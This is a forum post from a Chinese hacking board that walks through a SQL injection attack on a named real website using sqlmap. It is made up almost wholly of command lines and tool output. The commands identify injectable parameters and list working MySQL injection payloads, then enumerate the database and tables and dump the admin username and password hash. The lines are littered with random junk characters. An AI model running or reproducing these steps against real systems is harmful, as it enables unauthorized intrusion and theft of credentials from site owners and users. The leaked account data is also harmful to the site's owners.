找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2430|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
/ Q$ P$ |2 L" h8 b) h  |ms "Mysql" --current-user       /*  注解:获取当前用户名称: m2 A5 Y3 X. S" w0 g& _0 ~
    sqlmap/0.9 - automatic SQL injection and database takeover tool
5 s4 @0 B# b; ^# k; i    http://sqlmap.sourceforge.net
  • starting at: 16:53:541 b$ A5 @$ u' h+ \
    [16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as0 W: z% B4 @. a# y+ W  B& J7 b
    session file
    ) L  }; w# S* U1 z5 h[16:53:54] [INFO] resuming injection data from session file1 s* G4 |) b, d7 o. o1 v
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file# ~; d0 W8 s8 `5 t
    [16:53:54] [INFO] testing connection to the target url
    0 l& Z7 o7 W" ?- k# |; usqlmap identified the following injection points with a total of 0 HTTP(s) reque; |5 p' y3 ?/ V1 Z
    sts:% V1 B5 r) h/ R$ b0 \
    ---
    3 ^/ ^: _9 S+ FPlace: GET" k+ z& ^6 S2 m
    Parameter: id8 ~) E1 x6 [7 k. l& G( _: H# v
        Type: boolean-based blind
    % s( H- U, x) o8 E7 ]    Title: AND boolean-based blind - WHERE or HAVING clause$ t/ J+ p! {; o* J2 V; d) G
        Payload: id=276 AND 799=799% a3 z  I9 a' s" i4 G
        Type: error-based5 O: a$ B; ]" u# b: V, n
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause' I3 p& E4 N- {5 j* \, l
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    5 w& y8 i  w" i- H$ j8 _120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58, R7 t2 u" D* U1 t& u& U
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); L9 a0 C# M; F: ]' U3 s& G) a: k
        Type: UNION query" E9 Z8 X5 X. O5 d3 v6 ~% U3 \
        Title: MySQL UNION query (NULL) - 1 to 10 columns. t8 B# q6 v8 F- V
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
      Z7 o1 D+ ~0 j- W(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    / n8 j! _& b0 J# GCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#: M  U9 o( K6 h5 n* {# Z
        Type: AND/OR time-based blind  o6 m- j: C6 z2 u; f9 g! |- F# a, r
        Title: MySQL > 5.0.11 AND time-based blind4 @# S1 J' h1 q
        Payload: id=276 AND SLEEP(5)
      C; o. G) r( R% @( i( w---1 Y6 F8 p$ r- e0 O4 q: [
    [16:53:55] [INFO] the back-end DBMS is MySQL" l  G1 b, b$ D$ _
    web server operating system: Windows6 ?5 K5 q2 i% j; s3 X
    web application technology: Apache 2.2.11, PHP 5.3.0
    2 q0 L6 y% H. Dback-end DBMS: MySQL 5.0% s/ E9 y. n3 g$ M- N
    [16:53:55] [INFO] fetching current user. U, m6 @+ M4 R9 H& a$ Q9 @
    current user:    'root@localhost'   
    0 t) D8 S( v8 l9 b/ x/ B[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    2 ~4 A5 P4 @$ e8 ktput\www.wepost.com.hk'
  • shutting down at: 16:53:589 j# x. G! z" t  g6 z# S
    & v3 V# ]2 a. l  K! n2 d3 V! ?* m
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db1 B( {1 x8 O3 c- [( S* t# T
    ms "Mysql" --current-db                  /*当前数据库
    2 I$ t2 D; c, A( O# P! ]    sqlmap/0.9 - automatic SQL injection and database takeover tool  ~" H6 V% {: |" }
        http://sqlmap.sourceforge.net
  • starting at: 16:54:166 D6 ^4 x; m& J! C( B
    [16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as$ x7 j, g3 x+ y+ Q
    session file1 j1 j" t" a: r( C4 l
    [16:54:16] [INFO] resuming injection data from session file
    7 I# }9 `  Q6 C[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    8 L! `7 o% p& }  b[16:54:16] [INFO] testing connection to the target url
    ) ~) ]  |( d9 H& G6 v) D" h& {sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    $ P, |& b7 f# E# m. qsts:
    ; r9 ?7 v; t, g$ G( P  B---
    - V3 h8 x: t) JPlace: GET
    / [" W( _' q; x! W8 tParameter: id
    % i' Z/ F. c3 y    Type: boolean-based blind1 `3 n- n) z+ P
        Title: AND boolean-based blind - WHERE or HAVING clause* |) c5 H/ U8 T, F" {0 g" f
        Payload: id=276 AND 799=7997 h9 m4 [. k+ o4 K9 z0 S
        Type: error-based
    3 S; b) E, c" u& c; z1 A    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause2 ?% W5 X% q& F+ h0 f  S4 Y& R& a
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    3 j: h& K, p' j; w120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    / w6 k& a9 s- ]- c),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" I* g9 e1 |2 I* @
        Type: UNION query$ J- z/ i6 H' g$ W4 }
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    3 @9 {5 S4 D# G3 A    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR* N$ X* W, E4 M) p' J- z. g
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    * K2 {! E. ~" e3 j$ K) o9 W/ UCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#- ]+ T, m1 v- }  b4 l
        Type: AND/OR time-based blind% g' c/ `( U) E& H3 a( ~0 b. u
        Title: MySQL > 5.0.11 AND time-based blind
    / c& j# C- K5 T! ?    Payload: id=276 AND SLEEP(5)% l2 K$ s8 P* C! q) e
    ---; H$ X" D* Y! u/ [# u- L
    [16:54:17] [INFO] the back-end DBMS is MySQL
    * s6 w9 q$ V5 {2 R$ T* rweb server operating system: Windows
    , n& t  a! C3 ^9 G! a8 {web application technology: Apache 2.2.11, PHP 5.3.0
    % O1 @  q! n* g5 @. lback-end DBMS: MySQL 5.0) C; n  G6 g$ V" g0 c# e  ]1 O+ M4 K
    [16:54:17] [INFO] fetching current database2 g" Z8 D) M$ |7 Q
    current database:    'wepost'
    ; X' V1 H3 D( G* k. @1 G[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou3 ~; {# h+ T+ J. l. h/ f
    tput\www.wepost.com.hk'
  • shutting down at: 16:54:188 ]$ R0 y* Z6 u0 w" d
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db9 q( G" q% M' E: S1 C4 x. l
    ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    5 C6 s2 ]9 j! O' _: C    sqlmap/0.9 - automatic SQL injection and database takeover tool/ a4 f" p: I) n8 }! ?
        http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    7 |4 d3 K2 r9 M* G# K[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    : n( Z0 T/ K- @' i7 V session file
    2 w2 }* S: f. G: M% u[16:55:25] [INFO] resuming injection data from session file0 q2 I# B/ l8 H$ D9 c2 g
    [16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file; d, j9 Q) k. d. k7 C
    [16:55:25] [INFO] testing connection to the target url& e3 {+ _! c  w! }" O" _( @* c2 {; {
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque9 j5 }) U( p! `" l- D% _5 c$ G
    sts:
      N, ]+ Q5 V' s& f# ~5 d( L0 y---5 [, t" K, v3 ?$ `& E
    Place: GET
    9 t, [2 G2 W; @, K. C/ x( fParameter: id" o' n& G2 @! ?; w
        Type: boolean-based blind
      {5 y( {0 M4 |4 D- ?: j- m$ ?    Title: AND boolean-based blind - WHERE or HAVING clause
    8 r4 g" v6 d  z% t6 Z3 ^    Payload: id=276 AND 799=7997 E" \+ @$ [8 S/ \
        Type: error-based
    ' b  V! l; `* S- c* R- u    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause. @( s# `: f% b! A
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,9 o" P, i' N( M8 z
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,589 s; V/ c( P' }9 I) T
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)! o) Y+ S# ^9 G* Y
        Type: UNION query# R  @$ i( b% \, h/ n
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    $ U4 l/ a, m9 d% P$ C* a    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    4 ?1 ]* t1 l) a. O(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    . h! ^/ I7 b0 C" m) }1 dCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    ( g3 N  ~  E) ?, y: Q% p1 L+ N3 n    Type: AND/OR time-based blind) |" m  a! j, i4 }: j2 G4 P0 h
        Title: MySQL > 5.0.11 AND time-based blind
    4 E) b( _/ U% P  L/ a  j3 q- t5 j, a) d    Payload: id=276 AND SLEEP(5)
    & N! A) L0 w: E" @---
    9 S' e' X) w1 j8 ]6 ^[16:55:26] [INFO] the back-end DBMS is MySQL
    " X" v. V; x$ h4 [; Z0 i2 e: Wweb server operating system: Windows" A- d: }. U, M8 W. f
    web application technology: Apache 2.2.11, PHP 5.3.0
    5 ?3 G) O7 ~3 A4 F9 E! q+ dback-end DBMS: MySQL 5.0( z( V( T  ^, X% U) D2 f8 @
    [16:55:26] [INFO] fetching tables for database 'wepost'
    $ K! g" b+ E  |- W& c* e[16:55:27] [INFO] the SQL query used returns 6 entries8 _) R8 h9 v; F0 C1 ~
    Database: wepost3 _% f9 t7 p8 Z7 a* `& w" \
    [6 tables]
    4 Y  l2 U4 c) J2 k1 t4 P+ @+-------------+7 d5 X4 g6 j( ]1 [6 U: A8 ?
    | admin       |
    / d1 V2 R. A; ~9 l* @| article     |
    6 ^! Z& ?8 D4 Q! T: _7 T+ V| contributor |3 v. l. K( q; u) s+ j' {
    | idea        |
    7 q* L- c8 s: z5 t% X6 ^1 _8 h| image       |% G' |2 v$ _1 @  |
    | issue       |4 Q' d# O5 f& M' V" ]
    +-------------+
    $ W. ]+ x1 |& g6 b3 d[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou  f/ `9 u" \5 Q8 N2 f5 q: e( Y, z
    tput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    0 W# N% b7 ~: s# L* ?: G( p6 y* ~. Q& ?& S' k- u- N  ]% k. N
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db; T: _& Q# g, A- ]. G9 {) j/ P3 Q
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
    . l& {/ Y* Q' J6 V5 D# }6 Q    sqlmap/0.9 - automatic SQL injection and database takeover tool; d: B! C8 g. \7 K$ I
        http://sqlmap.sourceforge.net
  • starting at: 16:56:069 I8 |9 l% K5 ^' ^/ q. X
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque7 |6 d% `: q9 o7 Z  I. P" F9 l
    sts:  K. ~" P$ [/ e) I6 Z- R
    ---
    9 d3 ~5 w6 J8 z2 T2 cPlace: GET
    1 s( Q8 g- R  L. RParameter: id
    2 {& ~( l) c/ T  `% Q: Z0 f    Type: boolean-based blind
    6 o+ H# }1 Y: s6 C( P/ H9 M, }    Title: AND boolean-based blind - WHERE or HAVING clause
    ( R, T  H$ W. d, }  C4 g4 j    Payload: id=276 AND 799=799. C. W+ B0 @; B( |
        Type: error-based
      y, z" c7 \( ?+ A# h# d    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    " N& r, m6 g3 b6 Y- G- V2 z    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,( u- N6 O- t3 k; {( H
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,581 o0 }9 ]4 X; E# `  x. B) C: Q
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)) M+ O9 z& R( s7 L
        Type: UNION query- u4 y* b8 x$ z
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    & d- Y$ ^2 z7 m& V: _3 t0 T    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR- \- \' X5 d4 i4 o" I. |
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    1 l. n$ Z; ?6 X5 R& J" i2 XCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    $ _# f  b( k3 }  z, J! ~. B( ^    Type: AND/OR time-based blind
    $ M& b0 @0 [% T: P. ?    Title: MySQL > 5.0.11 AND time-based blind
    5 @  U& `2 Q6 l3 a/ e    Payload: id=276 AND SLEEP(5); y9 m8 n1 Y; m0 c' s
    ---
    ( z2 h; D) ^, n; j8 Hweb server operating system: Windows
    4 b$ s+ \6 D7 }0 Z0 i" E8 }" Q% U; Pweb application technology: Apache 2.2.11, PHP 5.3.0
    3 j. z. R: q" e9 A$ L4 `" m. G, r0 jback-end DBMS: MySQL 5.01 [9 W$ m; [6 d5 H
    [16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    % p# W- Q( o7 S* X* Assion': wepost, wepost" R9 x  L1 u3 j; F6 p/ L
    Database: wepost
    " k: J/ ?  |' G" r6 r, w$ N! wTable: admin! E4 u* K" K" y& N
    [4 columns]
    6 I$ t$ v' E$ v& y# C- u$ p1 D. o  A+----------+-------------+
    1 i. A7 R( D! S+ E1 ]| Column   | Type        |
    ( m' f1 Z- s+ K, M+----------+-------------+
    / Z' M9 y6 w5 V( s% w' e) a6 e| id       | int(11)     |
    # R9 R- _7 w0 r. g  C/ r2 E| password | varchar(32) |) q# D. `* y5 q5 X) v
    | type     | varchar(10) |) q# z" J" A1 q/ R3 v  \: a9 `( m
    | userid   | varchar(20) |
    2 S' R& s! n6 o' A+----------+-------------+
    7 E7 x9 [  Q: g7 v5 J7 K7 H
  • shutting down at: 16:56:190 u9 G8 \, {0 T, ~7 O
    0 H9 ^/ J+ o9 U4 r5 X3 ?
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db. K9 G- e- L8 u" W% V& i. `' Z
    ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容
    2 f% V& G0 b& b7 G    sqlmap/0.9 - automatic SQL injection and database takeover tool$ l( ?: }% F5 ~
        http://sqlmap.sourceforge.net
  • starting at: 16:57:14$ u0 \; G0 W- R! b3 C
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque0 w- R! {8 }& N2 |' E: k3 x: n
    sts:
    9 n8 g9 F; N- A- A" y0 z( F7 W9 o---, L. m+ a$ U: h5 A+ v' z+ r
    Place: GET* T3 L' L$ ]% A* T
    Parameter: id9 |& M+ v7 [" F3 B' H
        Type: boolean-based blind! M  l( O( }0 K3 {/ k, c
        Title: AND boolean-based blind - WHERE or HAVING clause7 B" L3 R8 {0 {8 ]/ N, L, M" b
        Payload: id=276 AND 799=799$ ]5 ]) ^5 R$ |0 A# W" p/ p
        Type: error-based
    ( k, A; w6 ~/ }. Z. ]    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    0 P6 A: k3 |2 r; \+ T' `2 S. q( J$ R    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    . F; Y; l% u2 B8 X' k7 L. |120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58% |: c4 l* ]9 j
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)2 J! ^; Q0 F+ H, C- @5 n5 F' u
        Type: UNION query* n" r7 {, E: F' ]% k, x) ]
        Title: MySQL UNION query (NULL) - 1 to 10 columns- S, P2 c  P5 ^7 n0 v$ a" o* c
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    % j2 o! Q( y8 `9 a; a9 t(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR)," L. o# s& ^6 }) `
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#2 M* i" P- Q, \) m
        Type: AND/OR time-based blind- ]- @/ X5 ^" c
        Title: MySQL > 5.0.11 AND time-based blind
    ( K! G" T3 _3 N+ l7 a4 O    Payload: id=276 AND SLEEP(5)
    - I$ |7 p2 P8 ^; E+ B" y---0 \) J: p7 V! }8 Y* U
    web server operating system: Windows
    7 V% k- Y4 J; z1 J* K1 Wweb application technology: Apache 2.2.11, PHP 5.3.0
    + D' Z% t+ |1 U$ i5 gback-end DBMS: MySQL 5.0
    ! x9 n  U7 x. E, M2 Zrecognized possible password hash values. do you want to use dictionary attack o
      x8 h/ L9 C- w+ Z+ J9 k3 I$ dn retrieved table items? [Y/n/q] y
    5 \) t! i" `- r+ I* Hwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]) B, B- p0 U/ f$ K, f
    do you want to use common password suffixes? (slow!) [y/N] y
    6 Y$ c7 ?: f% ~7 C- `Database: wepost
    ) {+ S- W% P* |) O9 MTable: admin
    / P0 J: {5 z8 g; Z[1 entry]& o% \+ [2 h3 W* S* _
    +----------------------------------+------------+
    2 G- E, S# I6 a# A3 {# w| password                         | userid     |/ y: @- x& _& A5 U8 z
    +----------------------------------+------------+
    ! Q8 c5 w4 Q* R( I/ I| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |6 C7 m9 ], Y" o* H* i
    +----------------------------------+------------+
    8 n6 P; q( F' I; O) M, k" {
  • shutting down at: 16:58:147 _7 x6 i7 C. i4 U: U

    + Z4 J5 f! p* xD:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表